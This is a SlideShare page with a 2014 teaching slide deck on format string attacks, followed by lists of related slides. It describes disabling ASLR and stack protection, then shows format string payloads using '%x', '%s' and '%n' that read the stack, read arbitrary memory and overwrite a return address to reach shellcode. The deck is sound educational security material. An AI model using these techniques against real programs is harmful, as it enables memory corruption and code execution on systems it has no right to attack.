SlideShare une entreprise Scribd logo

[MOSUT] Format String Attacks

Télécharger en tant que PPTX, PDF
Aj MaChInE
Aj MaChInE

This document discusses format string attacks and how they can be exploited. It provides an example (fsa.c) of a program with a format string vulnerability. By compiling the program without protections and disabling ASLR, an attacker can view the program stack using different format strings. This allows viewing memory at any location and overwriting arbitrary memory by exploiting the %n field. So a format string vulnerability can be used to overwrite return addresses and execute shellcode.

Développement personnelDivertissement et humourTechnologie
1  sur  16
Format String Attacks AJ 2014.1.18
About Me • Study in National Chung Cheng University • The simulator of 5 axis CNC machine tool • CUDA programming for the collision detection in real time • 若渴計畫 & MOSUT
Outline • Illustrating format string vulnerabilities • A case study • • • • • fsa.c Compile and setup insecure environment Viewing the stack Viewing memory at any location Overwriting of arbitrary memory • So, you can…
Format String Vulnerabilities • format string <->argv[1] • printf(argv[1]) • strcpy(buff,argv[1]) • snprintf(buf,sizeof buf,argv[1]); •… • EX: compile & execute
A Case Study: fsa.c
A Case Study: Compile and Setup Insecure Environment • Compile • gcc -g -Wno-format-security -fno-stack-protector fsa.c • Disable ASLR(address space layout randomization) • sudo sysctl -w kernel.randomize_va_space=0 • X86 machine & Unbuntu 12.04
Stack Status before Executing snpritf() esp ?? ?? ?? x = 97 = ‘a’ buf[100] stack
Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) Buffer length argv[1] pointer ?? b7ff3fec ?? bfffff3b4 c call convention http://descent-incoming.blogspot.tw/2012/11/pascal-call-convention-in-c.html ?? 0 x = 97 = ‘a’ buf[100] Richard Reese,透視c語言指標 p.128
Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) fetch Buffer length argv[1] pointer stack %x ?? b7ff3fec %x ?? bfffff3b4 %x ?? 0 %x x = 97 = ‘a’ %x buf[100]
Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer Buffer length • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) argv[1] pointer ?? b7ff3fec ?? bfffff3b4 ?? 0 copy x = 97 = ‘a’ %x?? Execution order of “copy” and “fetch” are switched by OS buf[100]=b7ff3fec. Bfffff3b4. 0.61.66663762(ff7b)
Viewing the Stack: “aaaa.%x.%x.%x.%x.%x” • Format string = aaaa.%x.%x.%x.%x.%x heap “aaaa.%x.%x.%x.% x.%x” Buffer pointer • ‘a’ is 0x61 in ASCII • snprintf(buf, sizeof buf, “aaaa.%x.%x.%x.%x.%x”) Buffer length argv[1] pointer %x ?? b7ff3fec %x ?? bfffff3b4 %x ?? 0 %x x = 97 = ‘a’ %x buf[100]=aaaa.b7ff3f ec.bffff3a4.0.61.6161 6161
Viewing Memory at Any Location • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%x • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%s bffff2f8 x = 97 = ‘a’ %s buf[0]=bffff2f8
Overwriting of Arbitrary Memory • The %n field was encountered in the format string • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%n 26(??) alignment bffff2f8 x = 97 = ‘a’ %s buf[0]=bffff2f8 bffff2f8 x = 28 = 0x1c %n buf[0]=bffff2f8
So, You Can… • Format string vulnerabilities • Viewing the stack • Finding return addresses • Overwriting return address • Overwriting return addresses to point to shellcode • EX: $ ./a.out $(printf “return address”).%x.%x.%x.%x.%n => retrun address = 28 $ ./a.out $(printf “return address”).%x.%x.%x.%4x.%n => retrun address = 30 $ ./a.out $(printf “return address”).%x.%x.%x.%8x.%n => retrun address = 34 $ ./a.out $(printf “return address”).%Xx.%Yx.%Zx.%Ax.%n => retrun address = shellcode address
You can overwrite arbitrary memory, if there are format string vulnerabilities
Reference • Tim Newsham, “Format String Attacks” • http://www.thenewsh.com/~newsham/format-string-attacks.pdf • stackoverflow,“How can a Format-String vulnerability be exploited?” • http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerabilitybe-exploited • Paul Haas, Advanced Format String Attacks • http://www.defcon.org/images/defcon-18/dc-18-presentations/Haas/DEFCON-18Haas-Adv-Format-String-Attacks.pdf • David Brumley, Cource sliedes • http://users.ece.cmu.edu/~dbrumley/courses/18739c-s11/slides/0127.pdf • Scut et al,”Exploiting Format String Vulnerabilities” • http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf

Recommandé

2.Format Strings
2.Format Strings2.Format Strings
2.Format Stringsphanleson
 
Control hijacking
Control hijackingControl hijacking
Control hijackingG Prachi
 
6 buffer overflows
6 buffer overflows6 buffer overflows
6 buffer overflowsdrewz lin
 
Buffer Overflows
Buffer OverflowsBuffer Overflows
Buffer OverflowsSumit Kumar
 
Common mistakes in C programming
Common mistakes in C programmingCommon mistakes in C programming
Common mistakes in C programmingLarion
 
Buffer Overflow Attacks
Buffer Overflow AttacksBuffer Overflow Attacks
Buffer Overflow Attacksharshal kshatriya
 
Evgeniy Muralev, Mark Vince, Working with the compiler, not against it
Evgeniy Muralev, Mark Vince, Working with the compiler, not against itEvgeniy Muralev, Mark Vince, Working with the compiler, not against it
Evgeniy Muralev, Mark Vince, Working with the compiler, not against itSergey Platonov
 
Yandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msanYandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msanYandex
 

Recommandé

2.Format Strings
2.Format Strings2.Format Strings
2.Format Stringsphanleson
 
Control hijacking
Control hijackingControl hijacking
Control hijackingG Prachi
 
6 buffer overflows
6 buffer overflows6 buffer overflows
6 buffer overflowsdrewz lin
 
Buffer Overflows
Buffer OverflowsBuffer Overflows
Buffer OverflowsSumit Kumar
 
Common mistakes in C programming
Common mistakes in C programmingCommon mistakes in C programming
Common mistakes in C programmingLarion
 
Buffer Overflow Attacks
Buffer Overflow AttacksBuffer Overflow Attacks
Buffer Overflow Attacksharshal kshatriya
 
Evgeniy Muralev, Mark Vince, Working with the compiler, not against it
Evgeniy Muralev, Mark Vince, Working with the compiler, not against itEvgeniy Muralev, Mark Vince, Working with the compiler, not against it
Evgeniy Muralev, Mark Vince, Working with the compiler, not against itSergey Platonov
 
Yandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msanYandex may 2013 a san-tsan_msan
Yandex may 2013 a san-tsan_msanYandex
 
Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...Minsk Linux User Group
 
Mathematicians: Trust, but Verify
Mathematicians: Trust, but VerifyMathematicians: Trust, but Verify
Mathematicians: Trust, but VerifyAndrey Karpov
 
Антон Бикинеев, Reflection in C++Next
Антон Бикинеев, Reflection in C++NextАнтон Бикинеев, Reflection in C++Next
Антон Бикинеев, Reflection in C++NextSergey Platonov
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects Andrey Karpov
 
Rust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command LineRust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command LineMatt Provost
 
Weakened Random Oracle Models with Target Prefix
Weakened Random Oracle Models with Target PrefixWeakened Random Oracle Models with Target Prefix
Weakened Random Oracle Models with Target PrefixMASAYUKITEZUKA1
 
Price of an Error
Price of an ErrorPrice of an Error
Price of an ErrorAndrey Karpov
 
1.Buffer Overflows
1.Buffer Overflows1.Buffer Overflows
1.Buffer Overflowsphanleson
 
Valgrind
ValgrindValgrind
Valgrindaidanshribman
 
Tensor comprehensions
Tensor comprehensionsTensor comprehensions
Tensor comprehensionsMr. Vengineer
 
Антон Бикинеев, Writing good std::future&lt; C++ >
Антон Бикинеев, Writing good std::future&lt; C++ >Антон Бикинеев, Writing good std::future&lt; C++ >
Антон Бикинеев, Writing good std::future&lt; C++ >Sergey Platonov
 
20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugs20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugsComputer Science Club
 
Tiramisu概要
Tiramisu概要Tiramisu概要
Tiramisu概要Mr. Vengineer
 
TensorFlow local Python XLA client
TensorFlow local Python XLA clientTensorFlow local Python XLA client
TensorFlow local Python XLA clientMr. Vengineer
 
20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugs20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugsComputer Science Club
 
Linux on System z debugging with Valgrind
Linux on System z debugging with ValgrindLinux on System z debugging with Valgrind
Linux on System z debugging with ValgrindIBM India Smarter Computing
 
Clang tidy
Clang tidyClang tidy
Clang tidyYury Yafimachau
 
Handling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVMHandling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVMMin-Yih Hsu
 
tick cross game
tick cross gametick cross game
tick cross gamesanobersheir
 
[SITCON2015] 自己的異質多核心平台自己幹
[SITCON2015] 自己的異質多核心平台自己幹[SITCON2015] 自己的異質多核心平台自己幹
[SITCON2015] 自己的異質多核心平台自己幹Aj MaChInE
 
[若渴計畫]64-bit Linux Return-Oriented Programming
[若渴計畫]64-bit Linux Return-Oriented Programming[若渴計畫]64-bit Linux Return-Oriented Programming
[若渴計畫]64-bit Linux Return-Oriented ProgrammingAj MaChInE
 
[若渴計畫]由GPU硬體概念到coding CUDA
[若渴計畫]由GPU硬體概念到coding CUDA[若渴計畫]由GPU硬體概念到coding CUDA
[若渴計畫]由GPU硬體概念到coding CUDAAj MaChInE
 

Contenu connexe

Tendances

Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...Minsk Linux User Group
 
Mathematicians: Trust, but Verify
Mathematicians: Trust, but VerifyMathematicians: Trust, but Verify
Mathematicians: Trust, but VerifyAndrey Karpov
 
Антон Бикинеев, Reflection in C++Next
Антон Бикинеев, Reflection in C++NextАнтон Бикинеев, Reflection in C++Next
Антон Бикинеев, Reflection in C++NextSergey Platonov
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects Andrey Karpov
 
Rust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command LineRust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command LineMatt Provost
 
Weakened Random Oracle Models with Target Prefix
Weakened Random Oracle Models with Target PrefixWeakened Random Oracle Models with Target Prefix
Weakened Random Oracle Models with Target PrefixMASAYUKITEZUKA1
 
1.Buffer Overflows
1.Buffer Overflows1.Buffer Overflows
1.Buffer Overflowsphanleson
 
Tensor comprehensions
Tensor comprehensionsTensor comprehensions
Tensor comprehensionsMr. Vengineer
 
Антон Бикинеев, Writing good std::future&lt; C++ >
Антон Бикинеев, Writing good std::future&lt; C++ >Антон Бикинеев, Writing good std::future&lt; C++ >
Антон Бикинеев, Writing good std::future&lt; C++ >Sergey Platonov
 
20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugs20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugsComputer Science Club
 
TensorFlow local Python XLA client
TensorFlow local Python XLA clientTensorFlow local Python XLA client
TensorFlow local Python XLA clientMr. Vengineer
 
20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugs20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugsComputer Science Club
 
Handling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVMHandling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVMMin-Yih Hsu
 

Tendances (19)

Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...
 
Mathematicians: Trust, but Verify
Mathematicians: Trust, but VerifyMathematicians: Trust, but Verify
Mathematicians: Trust, but Verify
 
Антон Бикинеев, Reflection in C++Next
Антон Бикинеев, Reflection in C++NextАнтон Бикинеев, Reflection in C++Next
Антон Бикинеев, Reflection in C++Next
 
100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
 
Rust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command LineRust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command Line
 
Weakened Random Oracle Models with Target Prefix
Weakened Random Oracle Models with Target PrefixWeakened Random Oracle Models with Target Prefix
Weakened Random Oracle Models with Target Prefix
 
Price of an Error
Price of an ErrorPrice of an Error
Price of an Error
 
1.Buffer Overflows
1.Buffer Overflows1.Buffer Overflows
1.Buffer Overflows
 
Valgrind
ValgrindValgrind
Valgrind
 
Tensor comprehensions
Tensor comprehensionsTensor comprehensions
Tensor comprehensions
 
Антон Бикинеев, Writing good std::future&lt; C++ >
Антон Бикинеев, Writing good std::future&lt; C++ >Антон Бикинеев, Writing good std::future&lt; C++ >
Антон Бикинеев, Writing good std::future&lt; C++ >
 
20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugs20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugs
 
Tiramisu概要
Tiramisu概要Tiramisu概要
Tiramisu概要
 
TensorFlow local Python XLA client
TensorFlow local Python XLA clientTensorFlow local Python XLA client
TensorFlow local Python XLA client
 
20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugs20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugs
 
Linux on System z debugging with Valgrind
Linux on System z debugging with ValgrindLinux on System z debugging with Valgrind
Linux on System z debugging with Valgrind
 
Clang tidy
Clang tidyClang tidy
Clang tidy
 
Handling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVMHandling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVM
 
tick cross game
tick cross gametick cross game
tick cross game
 

En vedette

[SITCON2015] 自己的異質多核心平台自己幹
[SITCON2015] 自己的異質多核心平台自己幹[SITCON2015] 自己的異質多核心平台自己幹
[SITCON2015] 自己的異質多核心平台自己幹Aj MaChInE
 
[若渴計畫]64-bit Linux Return-Oriented Programming
[若渴計畫]64-bit Linux Return-Oriented Programming[若渴計畫]64-bit Linux Return-Oriented Programming
[若渴計畫]64-bit Linux Return-Oriented ProgrammingAj MaChInE
 
[若渴計畫]由GPU硬體概念到coding CUDA
[若渴計畫]由GPU硬體概念到coding CUDA[若渴計畫]由GPU硬體概念到coding CUDA
[若渴計畫]由GPU硬體概念到coding CUDAAj MaChInE
 
閱讀文章分享@若渴 2016.1.24
閱讀文章分享@若渴 2016.1.24閱讀文章分享@若渴 2016.1.24
閱讀文章分享@若渴 2016.1.24Aj MaChInE
 
[若渴計畫2015.8.18] SMACK
[若渴計畫2015.8.18] SMACK[若渴計畫2015.8.18] SMACK
[若渴計畫2015.8.18] SMACKAj MaChInE
 
[若渴計畫] Studying Concurrency
[若渴計畫] Studying Concurrency[若渴計畫] Studying Concurrency
[若渴計畫] Studying ConcurrencyAj MaChInE
 
[MOSUT20150131] Linux Runs on SoCKit Board with the GPGPU
[MOSUT20150131] Linux Runs on SoCKit Board with the GPGPU[MOSUT20150131] Linux Runs on SoCKit Board with the GPGPU
[MOSUT20150131] Linux Runs on SoCKit Board with the GPGPUAj MaChInE
 
Format string Attack
Format string AttackFormat string Attack
Format string Attackicchy
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksKapil Nagrale
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacksJoe McCarthy
 

En vedette (10)

[SITCON2015] 自己的異質多核心平台自己幹
[SITCON2015] 自己的異質多核心平台自己幹[SITCON2015] 自己的異質多核心平台自己幹
[SITCON2015] 自己的異質多核心平台自己幹
 
[若渴計畫]64-bit Linux Return-Oriented Programming
[若渴計畫]64-bit Linux Return-Oriented Programming[若渴計畫]64-bit Linux Return-Oriented Programming
[若渴計畫]64-bit Linux Return-Oriented Programming
 
[若渴計畫]由GPU硬體概念到coding CUDA
[若渴計畫]由GPU硬體概念到coding CUDA[若渴計畫]由GPU硬體概念到coding CUDA
[若渴計畫]由GPU硬體概念到coding CUDA
 
閱讀文章分享@若渴 2016.1.24
閱讀文章分享@若渴 2016.1.24閱讀文章分享@若渴 2016.1.24
閱讀文章分享@若渴 2016.1.24
 
[若渴計畫2015.8.18] SMACK
[若渴計畫2015.8.18] SMACK[若渴計畫2015.8.18] SMACK
[若渴計畫2015.8.18] SMACK
 
[若渴計畫] Studying Concurrency
[若渴計畫] Studying Concurrency[若渴計畫] Studying Concurrency
[若渴計畫] Studying Concurrency
 
[MOSUT20150131] Linux Runs on SoCKit Board with the GPGPU
[MOSUT20150131] Linux Runs on SoCKit Board with the GPGPU[MOSUT20150131] Linux Runs on SoCKit Board with the GPGPU
[MOSUT20150131] Linux Runs on SoCKit Board with the GPGPU
 
Format string Attack
Format string AttackFormat string Attack
Format string Attack
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 
Buffer overflow attacks
Buffer overflow attacksBuffer overflow attacks
Buffer overflow attacks
 

Similaire à [MOSUT] Format String Attacks

Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming Cloudflare
 
Race-conditions-web-locks-and-shared-memory
Race-conditions-web-locks-and-shared-memoryRace-conditions-web-locks-and-shared-memory
Race-conditions-web-locks-and-shared-memoryTimur Shemsedinov
 
JavaOne 2015 Java Mixed-Mode Flame Graphs
JavaOne 2015 Java Mixed-Mode Flame GraphsJavaOne 2015 Java Mixed-Mode Flame Graphs
JavaOne 2015 Java Mixed-Mode Flame GraphsBrendan Gregg
 
Dynamic memory allocation
Dynamic memory allocationDynamic memory allocation
Dynamic memory allocationViji B
 
FreeBSD 2014 Flame Graphs
FreeBSD 2014 Flame GraphsFreeBSD 2014 Flame Graphs
FreeBSD 2014 Flame GraphsBrendan Gregg
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程Weber Tsai
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsRussell Sanford
 
Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...
Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...
Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...Charles Nutter
 
Vim Script Programming
Vim Script ProgrammingVim Script Programming
Vim Script ProgrammingLin Yo-An
 
The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...
The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...
The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...DataStax
 
Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...
Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...
Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...confluent
 
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321Teddy Hsiung
 
JavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for DummiesJavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for DummiesCharles Nutter
 
Open Source Systems Performance
Open Source Systems PerformanceOpen Source Systems Performance
Open Source Systems PerformanceBrendan Gregg
 
Java Performance Analysis on Linux with Flame Graphs
Java Performance Analysis on Linux with Flame GraphsJava Performance Analysis on Linux with Flame Graphs
Java Performance Analysis on Linux with Flame GraphsBrendan Gregg
 
Bottom to Top Stack Optimization with LAMP
Bottom to Top Stack Optimization with LAMPBottom to Top Stack Optimization with LAMP
Bottom to Top Stack Optimization with LAMPkatzgrau
 
Bottom to Top Stack Optimization - CICON2011
Bottom to Top Stack Optimization - CICON2011Bottom to Top Stack Optimization - CICON2011
Bottom to Top Stack Optimization - CICON2011CodeIgniter Conference
 

Similaire à [MOSUT] Format String Attacks (20)

Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming
 
Race-conditions-web-locks-and-shared-memory
Race-conditions-web-locks-and-shared-memoryRace-conditions-web-locks-and-shared-memory
Race-conditions-web-locks-and-shared-memory
 
JavaOne 2015 Java Mixed-Mode Flame Graphs
JavaOne 2015 Java Mixed-Mode Flame GraphsJavaOne 2015 Java Mixed-Mode Flame Graphs
JavaOne 2015 Java Mixed-Mode Flame Graphs
 
Format String Exploitation
Format String ExploitationFormat String Exploitation
Format String Exploitation
 
Dynamic memory allocation
Dynamic memory allocationDynamic memory allocation
Dynamic memory allocation
 
FreeBSD 2014 Flame Graphs
FreeBSD 2014 Flame GraphsFreeBSD 2014 Flame Graphs
FreeBSD 2014 Flame Graphs
 
TDOH x 台科 pwn課程
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging Mechanisms
 
Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...
Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...
Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...
 
Vim Script Programming
Vim Script ProgrammingVim Script Programming
Vim Script Programming
 
The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...
The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...
The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...
 
Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...
Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...
Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...
 
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
 
JavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for DummiesJavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for Dummies
 
Open Source Systems Performance
Open Source Systems PerformanceOpen Source Systems Performance
Open Source Systems Performance
 
Java Performance Analysis on Linux with Flame Graphs
Java Performance Analysis on Linux with Flame GraphsJava Performance Analysis on Linux with Flame Graphs
Java Performance Analysis on Linux with Flame Graphs
 
Web Locks API
Web Locks APIWeb Locks API
Web Locks API
 
Bottom to Top Stack Optimization with LAMP
Bottom to Top Stack Optimization with LAMPBottom to Top Stack Optimization with LAMP
Bottom to Top Stack Optimization with LAMP
 
Bottom to Top Stack Optimization - CICON2011
Bottom to Top Stack Optimization - CICON2011Bottom to Top Stack Optimization - CICON2011
Bottom to Top Stack Optimization - CICON2011
 
Unix executable buffer overflow
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
 

Plus de Aj MaChInE

An Intro on Data-oriented Attacks
An Intro on Data-oriented AttacksAn Intro on Data-oriented Attacks
An Intro on Data-oriented AttacksAj MaChInE
 
A Study on .NET Framework for Red Team - Part I
A Study on .NET Framework for Red Team - Part IA Study on .NET Framework for Red Team - Part I
A Study on .NET Framework for Red Team - Part IAj MaChInE
 
A study on NetSpectre
A study on NetSpectreA study on NetSpectre
A study on NetSpectreAj MaChInE
 
Introduction to Adversary Evaluation Tools
Introduction to Adversary Evaluation ToolsIntroduction to Adversary Evaluation Tools
Introduction to Adversary Evaluation ToolsAj MaChInE
 
[若渴] A preliminary study on attacks against consensus in bitcoin
[若渴] A preliminary study on attacks against consensus in bitcoin[若渴] A preliminary study on attacks against consensus in bitcoin
[若渴] A preliminary study on attacks against consensus in bitcoinAj MaChInE
 
[RAT資安小聚] Study on Automatically Evading Malware Detection
[RAT資安小聚] Study on Automatically Evading Malware Detection[RAT資安小聚] Study on Automatically Evading Malware Detection
[RAT資安小聚] Study on Automatically Evading Malware DetectionAj MaChInE
 
[若渴] Preliminary Study on Design and Exploitation of Trustzone
[若渴] Preliminary Study on Design and Exploitation of Trustzone[若渴] Preliminary Study on Design and Exploitation of Trustzone
[若渴] Preliminary Study on Design and Exploitation of TrustzoneAj MaChInE
 
[若渴]Study on Side Channel Attacks and Countermeasures
[若渴]Study on Side Channel Attacks and Countermeasures [若渴]Study on Side Channel Attacks and Countermeasures
[若渴]Study on Side Channel Attacks and Countermeasures Aj MaChInE
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote ShellcodeAj MaChInE
 
[若渴計畫] Introduction: Formal Verification for Code
[若渴計畫] Introduction: Formal Verification for Code[若渴計畫] Introduction: Formal Verification for Code
[若渴計畫] Introduction: Formal Verification for CodeAj MaChInE
 
[若渴計畫] Studying ASLR^cache
[若渴計畫] Studying ASLR^cache[若渴計畫] Studying ASLR^cache
[若渴計畫] Studying ASLR^cacheAj MaChInE
 
[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理Aj MaChInE
 

Plus de Aj MaChInE (12)

An Intro on Data-oriented Attacks
An Intro on Data-oriented AttacksAn Intro on Data-oriented Attacks
An Intro on Data-oriented Attacks
 
A Study on .NET Framework for Red Team - Part I
A Study on .NET Framework for Red Team - Part IA Study on .NET Framework for Red Team - Part I
A Study on .NET Framework for Red Team - Part I
 
A study on NetSpectre
A study on NetSpectreA study on NetSpectre
A study on NetSpectre
 
Introduction to Adversary Evaluation Tools
Introduction to Adversary Evaluation ToolsIntroduction to Adversary Evaluation Tools
Introduction to Adversary Evaluation Tools
 
[若渴] A preliminary study on attacks against consensus in bitcoin
[若渴] A preliminary study on attacks against consensus in bitcoin[若渴] A preliminary study on attacks against consensus in bitcoin
[若渴] A preliminary study on attacks against consensus in bitcoin
 
[RAT資安小聚] Study on Automatically Evading Malware Detection
[RAT資安小聚] Study on Automatically Evading Malware Detection[RAT資安小聚] Study on Automatically Evading Malware Detection
[RAT資安小聚] Study on Automatically Evading Malware Detection
 
[若渴] Preliminary Study on Design and Exploitation of Trustzone
[若渴] Preliminary Study on Design and Exploitation of Trustzone[若渴] Preliminary Study on Design and Exploitation of Trustzone
[若渴] Preliminary Study on Design and Exploitation of Trustzone
 
[若渴]Study on Side Channel Attacks and Countermeasures
[若渴]Study on Side Channel Attacks and Countermeasures [若渴]Study on Side Channel Attacks and Countermeasures
[若渴]Study on Side Channel Attacks and Countermeasures
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
 
[若渴計畫] Introduction: Formal Verification for Code
[若渴計畫] Introduction: Formal Verification for Code[若渴計畫] Introduction: Formal Verification for Code
[若渴計畫] Introduction: Formal Verification for Code
 
[若渴計畫] Studying ASLR^cache
[若渴計畫] Studying ASLR^cache[若渴計畫] Studying ASLR^cache
[若渴計畫] Studying ASLR^cache
 
[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理
 

Dernier

Authentic No 1 Amil Baba In Pakistan Amil Baba In Faisalabad Amil Baba In Kar...
